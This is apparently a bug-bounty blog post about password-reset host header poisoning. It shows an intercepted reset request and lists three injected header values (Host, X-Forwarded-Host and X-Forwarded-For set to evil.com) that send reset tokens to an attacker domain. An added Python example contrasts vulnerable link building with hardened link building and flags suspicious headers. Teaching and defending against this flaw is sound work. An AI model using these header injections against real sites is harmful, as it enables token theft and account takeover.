How to find an easy P2
Hi everyone,
This post is about a low-effort P2 bug. It is not common and its severity is high, but finding it is a piece of cake and takes less than 5 minutes.
Here is the step-by-step procedure:
1. Let's say we have the target example.com.
2. Go to the password reset feature, request a password reset and intercept the request.
3. Let's say the HTTP request looks like this (I have redacted all the cookie values and the target name):
POST /api/reset-password/submit-email HTTP/1.1
Host: www.example.ca
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.example.ca/reset-password
Content-Type: application/json
X-CSRF-Token: [Redacted]
Origin: https://www.example.ca
Content-Length: 42
Connection: close
Cookie: ck_cabf=[Redacted]; ck_pcid=[Redacted]; _ga=[Redacted]; __utma=[Redacted]; __utmz=; ck_crumb=[Redacted]; utag_main=[Redacted]; _gid=[Redacted]; _gat=1

{"emailAddress":"[Redacted]"}
4. There are three things you can try to check for cache poisoning:
(i) edit the host header to Host: evil.com
(ii) leave the host header as it is and, on the line below it, add X-Forwarded-Host: evil.com
(iii) if (ii) doesn't work, use X-Forwarded-For: evil.com instead

5. If it is vulnerable you will receive the mail at your registered address, and when you open the link in it you will be redirected to something like https://evil.com/yourResetToken. That means the evil domain now has your token, which leads to account takeover.
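To show why steps (i)-(iii) work and how the server side should be written instead, here is an added example (my code, not from the original post). It puts the vulnerable pattern (a reset link built from X-Forwarded-Host or Host) next to a hardened version that always builds the link from a server-side canonical origin, refuses requests whose Host is not one the application serves, and returns the headers worth logging when a request carries a foreign host. CANONICAL_ORIGIN, ALLOWED_HOSTS and the function names are assumptions; the request dictionary is constructed to mirror step (ii).

```python
# Added defensive example (not code from the original post). Builds password
# reset links from a server-side canonical origin instead of request headers,
# and flags the headers this post abuses so they can be logged and alerted on.
# CANONICAL_ORIGIN, ALLOWED_HOSTS and the function names are assumptions.
import ipaddress

CANONICAL_ORIGIN = "https://www.example.ca"      # constructed: the only origin links may point at
ALLOWED_HOSTS = {"www.example.ca", "example.ca"}  # constructed allowlist of hostnames we serve


def _headers_ci(headers):
    """Case-insensitive view of a header dict (HTTP header names are case-insensitive)."""
    return {name.lower(): value for name, value in headers.items()}


def _hostname(host_value):
    """Strip an optional port from a Host-style value; keeps a bracketed IPv6 literal intact."""
    value = host_value.strip().lower()
    if value.startswith("["):
        return value[: value.find("]") + 1]
    return value.split(":", 1)[0]


def host_is_allowed(host_value):
    """Exact allowlist match on the hostname part only."""
    return bool(host_value) and _hostname(host_value) in ALLOWED_HOSTS


def naive_reset_link(headers, token):
    """The vulnerable pattern the post describes: the link is built from
    X-Forwarded-Host (or Host), so whoever controls that header controls
    where the token gets sent."""
    h = _headers_ci(headers)
    host = h.get("x-forwarded-host") or h.get("host")
    return f"https://{host}/reset-password/{token}"


def suspicious_headers(headers):
    """Return (header, value) pairs worth logging: a Host or X-Forwarded-Host
    outside the allowlist, or an X-Forwarded-For entry that is not an IP."""
    h = _headers_ci(headers)
    found = []
    for name in ("host", "x-forwarded-host"):
        if name in h and not host_is_allowed(h[name]):
            found.append((name, h[name]))
    for entry in h.get("x-forwarded-for", "").split(","):
        entry = entry.strip()
        if not entry:
            continue
        try:
            ipaddress.ip_address(entry)
        except ValueError:
            found.append(("x-forwarded-for", entry))
    return found


def build_reset_link(headers, token):
    """Hardened form: the link always points at CANONICAL_ORIGIN, and a request
    whose Host header is not one we serve gets no link at all (returns None).
    X-Forwarded-* headers are never consulted when building the link."""
    h = _headers_ci(headers)
    if not host_is_allowed(h.get("host", "")):
        return None
    return f"{CANONICAL_ORIGIN}/reset-password/{token}"


if __name__ == "__main__":
    # Constructed request mirroring step (ii): legitimate Host plus an injected X-Forwarded-Host.
    request = {
        "Host": "www.example.ca",
        "X-Forwarded-Host": "evil.com",
        "X-Forwarded-For": "198.51.100.7",
    }
    print("naive   :", naive_reset_link(request, "TOKEN"))
    print("hardened:", build_reset_link(request, "TOKEN"))
    print("flagged :", suspicious_headers(request))
```

The important design choice is that the hardened version never derives the link from anything the client sent: the origin is configuration, and the Host check is only there so a request for a hostname you do not serve is rejected and logged rather than answered. If the application sits behind a reverse proxy that legitimately sets X-Forwarded-Host, restrict the values it may carry at the proxy and still keep the link origin fixed in the application.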
Hope you liked this.